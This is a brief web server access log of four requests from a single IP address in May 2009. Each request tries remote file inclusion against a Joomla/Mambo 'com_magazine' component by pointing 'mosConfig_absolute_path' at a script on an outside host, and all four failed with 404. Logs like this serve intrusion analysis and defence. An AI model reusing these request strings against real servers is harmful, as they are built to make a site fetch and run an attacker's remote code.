218.249.36.194 - - [07/May/2009:22:50:15 -0400] "GET /logs/access_log.Q108122200%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:50:15 -0400] "GET /logs/access_log.Q108090900%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:50:22 -0400] "GET /logs/access_log.Q108122200%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:50:22 -0400] "GET /logs/access_log.Q108090900%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
